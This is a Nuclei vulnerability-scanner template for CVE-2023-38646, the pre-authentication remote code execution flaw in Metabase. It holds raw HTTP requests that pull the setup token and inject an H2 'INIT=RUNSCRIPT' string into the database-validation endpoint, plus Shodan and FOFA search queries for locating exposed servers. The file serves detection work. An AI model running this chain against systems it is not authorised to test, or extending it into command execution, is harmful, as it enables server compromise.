nuclei-templates/http/cves/2023/CVE-2023-38646.yaml

id: CVE-2023-38646

info:
  name: Metabase < 0.46.6.1 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.    
  reference:
    - https://www.metabase.com/blog/security-advisory
    - https://github.com/metabase/metabase/releases/tag/v0.46.6.1
    - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
    - https://news.ycombinator.com/item?id=36812256
    - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    - https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38646
    epss-score: 0.54087
    cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:*
    epss-percentile: 0.97174
  metadata:
    shodan-query: http.title:"Metabase"
    fofa-query: app="Metabase"
    verified: true
    max-request: 2
    vendor: metabase
    product: metabase
  tags: cve,cve2023,metabase,oss,rce
variables:
  file: "./plugins/vertica.metabase-driver.jar"

http:
  - raw:
      - |
        GET /api/session/properties HTTP/1.1
        Host: {{Hostname}}        
      - |
        POST /api/setup/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "token":"{{token}}",
           "details":{
              "details":{
                 "subprotocol":"h2",
                 "classname":"org.h2.Driver",
                 "advanced-options":true,
                 "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
              },
              "name":"{{randstr}}",
              "engine":"postgres"
           }
        }        

    extractors:
      - type: json
        part: body_1
        name: token
        json:
          - .["setup-token"]
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
          - status_code_2 == 400
        condition: and